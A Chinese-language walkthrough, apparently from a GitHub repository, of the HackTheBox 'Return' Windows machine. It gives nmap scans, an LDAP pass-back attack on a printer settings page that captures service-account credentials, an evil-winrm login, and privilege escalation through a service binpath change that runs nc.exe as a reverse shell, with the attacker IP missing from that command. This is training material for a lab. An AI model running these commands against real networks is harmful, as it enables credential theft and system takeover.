R3fr4kt/Return-TJNULL-OSCP-

# Return-TJNULL-OSCP- ## 执行摘要 - **目标操作系统：** Windows - **难度：** 简单 - **域名：** `return.local` - **核心概念：** Active Directory 基础设施、Web 到 LDAP 中继（Pass-Back）、WinRM 远程管理、服务二进制文件路径劫持。 ## 1. 枚举与信息收集 ### 端口扫描 (Nmap) 初始的基础设施评估首先通过高速 TCP 端口发现扫描覆盖了全部 65,355 个端口，以快速识别可用的入口点： ``` nmap -Pn -n -p- -sS --min-rate 5000 --open -oG allPorts ``` 随后针对已发现的端口执行了二次定向扫描，以探测服务版本并执行默认的 NSE 脚本审计： ``` nmap -p53,88,135,139,389,445,464,636,3268,3269,5985 -sCV -oN targeted ``` ### 本地环境设置 为了确保与潜在的 Active Directory 服务正确路由和交互，该域名被添加到了本地的 `/etc/hosts` 解析文件中： ``` sudo nano /etc/hosts # 追加行: return.local ``` ## 2. 初始访问与立足点 ### Web 界面与 LDAP 向量调查 1. 访问 `http://return.local` 会显示一个基于 Web 的打印机设置管理面板。 2. 在 **Settings** 子菜单下，暴露了一个内部打印机配置应用程序，其中显示了用于底层 LDAP 服务器连接测试的设置字段。 ### 利用：LDAP Pass-Back 攻击 由于该 Web 应用程序允许对 LDAP 服务端点地址进行自定义修改，因此可以执行 **Pass-Back 攻击**，强制内部服务账户向一个由攻击者控制的恶意监听器进行身份验证。 在攻击者的基础设施上，于默认 LDAP 端口 (`389`) 设置一个标准的网络监听器： ``` nc -lvnp 389 ``` 1. 在 Web 管理控制台中，将 **Server Address** 参数更新为攻击者机器的 IP 地址。 2. 提交配置修改。 3. 设备会自动触发身份验证握手，将服务账户的明文凭据传输给监听器。 ### 凭据验证 使用 `crackmapexec` 安全工具套件，通过 SMB 协议对拦截到的明文凭据（`svc-printer` : ``）进行了验证： ``` crackmapexec smb return.local -u 'svc-printer' -p '' ``` ### 远程 Shell 管理 (WinRM) 在成功完成验证并注意到端口 `5985` (WinRM) 处于开放状态后，通过 `evil-winrm` 建立了一个功能丰富且交互式的远程终端会话： ``` evil-winrm -i return.local -u 'svc-printer' -p '' ``` ### 获取 User Flag ``` cd ../Desktop type user.txt ``` ## 3. 权限提升 ### 本地环境枚举 对当前用户账户的组成员关系和权限进行了审计： ``` net user svc-printer ``` 输出结果显示，`svc-printer` 服务账户是自定义操作员组（例如 `Server Operators`）的成员，这赋予了它通过 `sc.exe` 操作和重新配置系统服务的权限。 ### 利用：服务二进制文件路径劫持 (`vss`) 由于具有广泛的权限设置，Volume Shadow Copy 服务 (`vss`) 被确定可作为路径重新配置的可行目标。 *前置条件：确保已将 Windows 兼容的 Netcat 二进制文件 (`nc.exe`) 上传到目标机器上（例如 `C:\Users\svc-printer\Desktop\` 目录内）。* 1. 重新配置 `vss` 服务的二进制文件路径 (`binpath`) 属性，以执行一个持续回调至监听器的 reverse shell payload： ``` sc.exe config vss binpath= "C:\Users\svc-printer\Desktop\nc.exe 4444 -e cmd.exe" ``` 2. 在攻击者系统上建立一个活跃的命令与控制 (C2) 监听器，以捕获特权 payload 的执行： ``` nc -lvnp 4444 ``` 3. 通过重新启动或手动启动服务状态，强制执行新修改的路径二进制文件： ``` sc.exe start vss ``` ## 4. 管理员权限巩固 在端口 `4444` 上拦截到传入的回调连接后，执行了系统身份验证： ``` whoami # 预期输出: nt authority\system ``` ### 获取 Root Flag ``` cd \ cd Users\Administrator\Desktop type root.txt ``` ``` ```

标签：Active Directory, Checkov, CTI, HackTheBox, PE 加载器, Plaso, Terraform 安全, Writeup, 协议分析, 权限提升